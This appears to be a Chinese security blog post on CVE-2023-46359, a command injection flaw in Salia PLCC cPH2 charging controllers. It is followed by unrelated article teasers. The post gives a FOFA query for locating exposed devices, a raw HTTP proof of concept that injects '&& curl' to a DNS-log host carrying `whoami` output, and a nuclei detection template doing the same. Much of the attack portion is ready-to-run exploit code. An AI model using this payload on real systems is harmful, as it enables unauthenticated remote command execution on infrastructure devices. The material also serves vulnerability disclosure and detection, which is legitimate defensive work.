当前位置: 首页 > news >正文

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

news 2026/3/31 12:01:52

漏洞描述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

产品界面

fofa语法

"Salia PLCC"

POC

 

  1. GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1
  2. Host: 
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  4. Content-Length: 0
 

 

 

nuclei验证
 

 

  1. id: CVE-2023-46359
  3. info:
  4. name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
  5. author: nobody
  6. severity: critical
  7. description: |
  8. Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
  9. impact: |
  10. 攻击者可远程执行系统命令
  11. remediation: |
  12. 升级版本,输入严格过滤
  13. metadata:
  14. verified: true
  15. max-request: 3
  16. fofa-query: "Salia PLCC"
  17. tags: CVE-2023-46359
  19. requests:
  20. - raw:
  21. - |
  22. @timeout:20s
  23. GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1
  24. Host: {{Hostname}}
  25. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  26. Content-Length: 0
  30. matchers-condition: and
  31. matchers:
  32. - type: word
  33. part: interactsh_protocol
  34. name: dns
  35. words:
  36. - "dns"
  37. - type: word
  38. part: body
  39. words:
  40. - "SUCCESS"
  42. - type: status
  43. status:
  44. - 200
 

 

 

修复建议
 

  • 建议升级到最新版本
  • 对输入传参做严格过滤
  •  
     声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权
     














相关文章:
















Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)




漏洞描述 
Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。 
产品界面 fofa语法 
"Salia PLCC" 
POC GET /connectioncheck.php?ip1…...






编程日记
2024/6/24 13:28:38



















路由表操作




路由表(Routing Table)是网络设备(如计算机、路由器、交换机等)用来确定数据包传输路径的数据库。每当网络设备收到一个数据包时,它会查找路由表,决定将数据包转发到哪个网络接口或网关。下面介绍路由表的基…...






编程日记
2024/6/24 13:25:35



















羊大师:拒绝心灵内耗:走向高效与平和




在繁忙的生活中,我们时常感到疲惫不堪,仿佛心灵被无形的枷锁束缚,这就是精神内耗。它让我们在思考、决策和行动中犹豫不决,消耗着我们的精力和时间,让我们无法专注于真正重要的事情。然而,我们有能力打破这…...






编程日记
2024/6/24 13:23:33



















IOS Swift 从入门到精通:Swift 简介,Swift中变量和常量,Swift中字符串,Swift中整数和浮点数




文章目录 为什么选择 Swift如何创建变量和常量如何创建变量和常量为什么 Swift 有常量和变量?如何创建字符串为什么 Swift 需要多行字符串?如何存储整数如何存储十进制数为什么选择 Swift 
编程语言有很多,但我认为你会非常喜欢学习 Swift。这部分是出于实际原因——你可以在…...






编程日记
2024/6/24 13:22:32



















聚焦AIoT最后一公里:EasyCVR+AI视频技术在各领域的创新应用




随着5G、AI、边缘计算、物联网(IoT)、云计算等技术的快速发展,万物互联已经从概念逐渐转变为现实,全新的行业生态AIoT正在开启新时代。巨大的市场潜力与AI等新兴技术不断融合形成的庞大市场缺口,深度场景化应用落地诉求…...






编程日记
2024/6/24 13:21:30



















怎样利用 Groovy 的元编程特性来创建自定义的 DSL(领域特定语言)?




使用Groovy的元编程特性可以方便地创建自定义的领域特定语言(DSL)。下面是一些利用Groovy元编程特性创建DSL的步骤: 定义DSL的语法结构:首先,您需要确定DSL的语法结构,包括关键字、表达式和语句的格式等。可…...






编程日记
2024/6/24 13:19:29



















自动预约申购 i茅台工具完善




自动预约申购茅台工具 概述新的改变界面预览 概述 
今天刷到一个windows自动刷茅台的工具,是用wpf实现的,看到作者最后是2023年更新的,评论中有好多人提出一些需求,刚才在学习wpf,就试着完善了一下。 
工具下载&#x…...






编程日记
2024/6/24 13:18:28



















Jitter Injection详解




一、定义与作用 
Jitter Injection,即抖动注入,是一种在通信系统中人为地添加抖动的技术。该技术通过在发送端对数据包进行延迟和抖动调整,以实现对整个通信系统的时延和抖动的控制。其主要作用包括: 
改善传输质量:通…...






编程日记
2024/6/24 13:16:25



















基于SSM+Jsp的校园餐厅管理




开发语言:Java框架:ssm技术:JSPJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包…...






编程日记
2024/6/24 13:15:24



















无线麦克风哪个品牌音质最好,一文告诉你无线领夹麦克风怎么挑选




随着直播带货和个人视频日志(Vlog)文化的兴起,以及自媒体内容创作的蓬勃发展,我们见证了麦克风行业的迅猛发展。在这一浪潮中,无线领夹麦克风以其无与伦比的便携性和操作效率,迅速赢得了广大视频制作者的喜…...






编程日记
2024/6/24 13:13:22



















Docker配置国内镜像加速-2




Docker 官方镜像仓库(如 Docker Hub)可能由于网络原因,在某些地区或网络环境下下载速度较慢。使用镜像加速可以从距离用户更近、网络条件更好的镜像服务器获取镜像,从而显著提高下载速度,节省时间。 1.测试是否安装 
d…...






编程日记
2024/6/24 13:12:20



















前后端分离项目面试总结




一:是否登录状态 服务端登录的时候,给分配一个session用于存储数据,同时将sessionID返回给浏览器,浏览器通过cookie把sessionID存储起来,下次访问时携带上,服务端就可以通过sessionID来确定用户是否登录。 …...






编程日记
2024/6/24 13:09:18



















力扣刷题笔记




记录5-6月力扣刷题,持续刷题中~ 
2024.05 
15.三数之和 
双指针或者哈希表,注意去重的操作要考虑仔细 
class Solution {
public:vector<vector<int>> threeSum(vector<int>& nums) {vector<vector<int>> result;sort…...






编程日记
2024/6/24 13:06:15



















【JS逆向百例】某点数据逆向分析,多方法详解




前言 
最近收到粉丝的私信&#xff0c;其在逆向某个站点时遇到了些问题&#xff0c;在查阅资料未果后&#xff0c;来询问K哥&#xff0c;K哥一向会尽力满足粉丝的需求。网上大多数分析该站点的教程已经不再适用&#xff0c;本文K哥将提供 3 种解决方案&#xff0c;对于 webpack…...






编程日记
2024/6/24 13:02:12



















windows系统docker镜像导出




docker镜像导入导出(windows)_windowdocker下载镜像导出-CSDN博客https://blog.csdn.net/qq_22211217/article/details/93936363...






编程日记
2024/6/24 13:01:11



















selenium前期准备




驱动地址&#xff1a; a. chromedriver:https://googlechromelabs.github.io/chrome-for-testing/ b. https://registry.npmmirror.com/binary.html?pathchromedriver/  selenium原理&#xff1a;Selenium 是一个用于自动化测试 Web 应用程序的工具集 a. 浏览器驱动&#xff0…...






编程日记
2024/6/24 13:00:10



















[Python人工智能] 四十六.PyTorch入门 (1)环境搭建、神经网络普及和Torch基础知识




从本专栏开始,作者正式研究Python深度学习、神经网络及人工智能相关知识。前文讲解合如何利用keras和tensorflow构建基于注意力机制的CNN-BiLSTM-ATT-CRF模型,并实现中文实体识别研究。这篇文章将介绍PyTorch入门知识。前面我们的Python人工智能主要以TensorFlow和Keras为主,…...






编程日记
2024/6/24 12:59:09



















示例:推荐一个应用Adorner做的通知和提示消息对话框




一、目的&#xff1a;在开发过程中&#xff0c;增加一些提示消息可以很好的提高用户体验&#xff0c;下面介绍一个用于增加提示消息的库 二、效果如下 可以看到右侧顶端弹出提示消息&#xff0c;消息间隔3s自动退出 
三、环境 VS2022 Net7 
四、使用方式 
安装nuget包&#xff…...






编程日记
2024/6/24 12:58:07



















nvdiadocker相关配置S3Gaussian




https://download.csdn.net/download/sinat_21699465/89458214 
dockerfile文件参考&#xff1a; 
https://download.csdn.net/download/sinat_21699465/89458214 
prework&#xff1a; 
显卡驱动决定了cuda版本支持的上限。例如nvdia535驱动最高支持cuda12.2所以显卡驱动版本选…...






编程日记
2024/6/24 12:55:05



















【科技前沿】电子设计新贵SmartEDA:为何它引领行业风潮?




在当今这个电子科技日新月异的时代&#xff0c;电子设计工具如同设计师的魔法棒&#xff0c;不断推动着产品创新的速度。而近期&#xff0c;一款名为SmartEDA的电子国产设计仿真软件异军突起&#xff0c;成为了行业内的新宠。那么&#xff0c;SmartEDA究竟有何过人之处&#xf…...






编程日记
2024/6/24 12:54:03





















告别复制粘贴!用Qwen Code在终端里直接重构500行烂代码(附真实项目截图)




告别复制粘贴&#xff01;用Qwen Code在终端里直接重构500行烂代码&#xff08;附真实项目截图&#xff09;
接手一个满是技术债的项目&#xff0c;就像走进一间多年无人打扫的仓库——到处是随意堆放的代码、重复的逻辑、难以理解的函数命名。更糟的是&#xff0c;传统的AI辅助…...






编程新知
2026/3/31 11:05:07



















LeagueAkari:英雄联盟智能辅助工具完全指南




LeagueAkari&#xff1a;英雄联盟智能辅助工具完全指南 【免费下载链接】League-Toolkit 兴趣使然的、简单易用的英雄联盟工具集。支持战绩查询、自动秒选等功能。基于 LCU API。   项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit     
LeagueAkari是一款基于英雄…...






编程新知
2026/3/31 10:14:25



















HarmonyOS6 半年磨一剑 - RcCheckboxGroup 组件与全选不确定态机制深度解析




文章目录前言一、RcCheckboxGroup 内部状态同步1.1 双层状态管理1.2 选中状态判断二、布局渲染架构2.1 横向与纵向的渲染分支2.2 itemGap 的类型安全处理2.3 属性透传机制三、全选与不确定态&#xff08;indeterminate&#xff09;3.1 三态状态机3.2 全选逻辑实现3.3 indetermi…...






编程新知
2026/3/31 9:05:53



















在QCS6490开发板上跑通Yolov8n目标检测:从ONNX模型到高通QNN格式的完整转换指南




在QCS6490开发板上部署Yolov8n目标检测&#xff1a;ONNX到QNN格式的终极转换手册
当嵌入式AI遇上高性能目标检测&#xff0c;QCS6490开发板与Yolov8n的组合正在工业质检、智能安防等领域掀起效率革命。本文将手把手带你突破模型转换的关键瓶颈——从标准ONNX格式到高通专属QNN格…...






编程新知
2026/3/31 8:23:38



















Kazumi:跨平台动漫资源整合解决方案,打造个性化追番体验




Kazumi&#xff1a;跨平台动漫资源整合解决方案&#xff0c;打造个性化追番体验 【免费下载链接】Kazumi 基于自定义规则的番剧采集APP&#xff0c;支持流媒体在线观看&#xff0c;支持弹幕。   项目地址: https://gitcode.com/gh_mirrors/ka/Kazumi     
动漫爱好者常面临三大…...






编程新知
2026/3/31 8:05:28



















3个关键场景与4步操作:深入解析RevokeMsgPatcher防撤回工具的技术实现与应用实践




3个关键场景与4步操作&#xff1a;深入解析RevokeMsgPatcher防撤回工具的技术实现与应用实践 【免费下载链接】RevokeMsgPatcher :trollface: A hex editor for WeChat/QQ/TIM - PC版微信/QQ/TIM防撤回补丁&#xff08;我已经看到了&#xff0c;撤回也没用了&#xff09;   项目…...






编程新知
2026/3/31 5:38:24



















树莓派通过HTTP协议对接OneNET Studio 5.0物联网平台实战指南




1. 环境准备与平台配置
在开始之前&#xff0c;我们需要准备好树莓派硬件和OneNET Studio 5.0平台账号。树莓派建议使用Raspberry Pi 4 Model B或更新型号&#xff0c;系统选择Raspbian或Raspberry Pi OS。OneNET Studio是中国移动推出的物联网开放平台&#xff0c;5.0版本对接…...






编程新知
2026/3/31 5:20:11



















现在不升级Polars 2.0清洗栈,你的ETL将在Q3面临300%延迟增长——基于AWS Graviton+Arrow 15.0实测基准报告




第一章&#xff1a;Polars 2.0清洗栈升级的必要性与Q3延迟危机预警Polars 2.0 的清洗栈重构并非功能叠加式演进&#xff0c;而是面向真实数据工程场景的范式重置。随着企业级ETL流水线中非结构化日志、嵌套JSON、时序传感器数据占比突破68%&#xff0c;旧版基于LazyFrame单通道…...






编程新知
2026/3/31 5:08:04



















OpenAddresses多语言支持:全球地址数据的终极处理指南




OpenAddresses多语言支持&#xff1a;全球地址数据的终极处理指南 【免费下载链接】openaddresses A global repository of open address data.   项目地址: https://gitcode.com/gh_mirrors/op/openaddresses     
OpenAddresses是全球最大的开源地址数据仓库&#xff0c;提供…...






编程新知
2026/3/31 4:37:16



















如何使用MQTTnet客户端工厂模式:对象创建与资源管理的终极指南




如何使用MQTTnet客户端工厂模式&#xff1a;对象创建与资源管理的终极指南 【免费下载链接】MQTTnet MQTTnet is a high performance .NET library for MQTT based communication. It provides a MQTT client and a MQTT server (broker). The implementation is based on the …...






编程新知
2026/3/31 4:27:13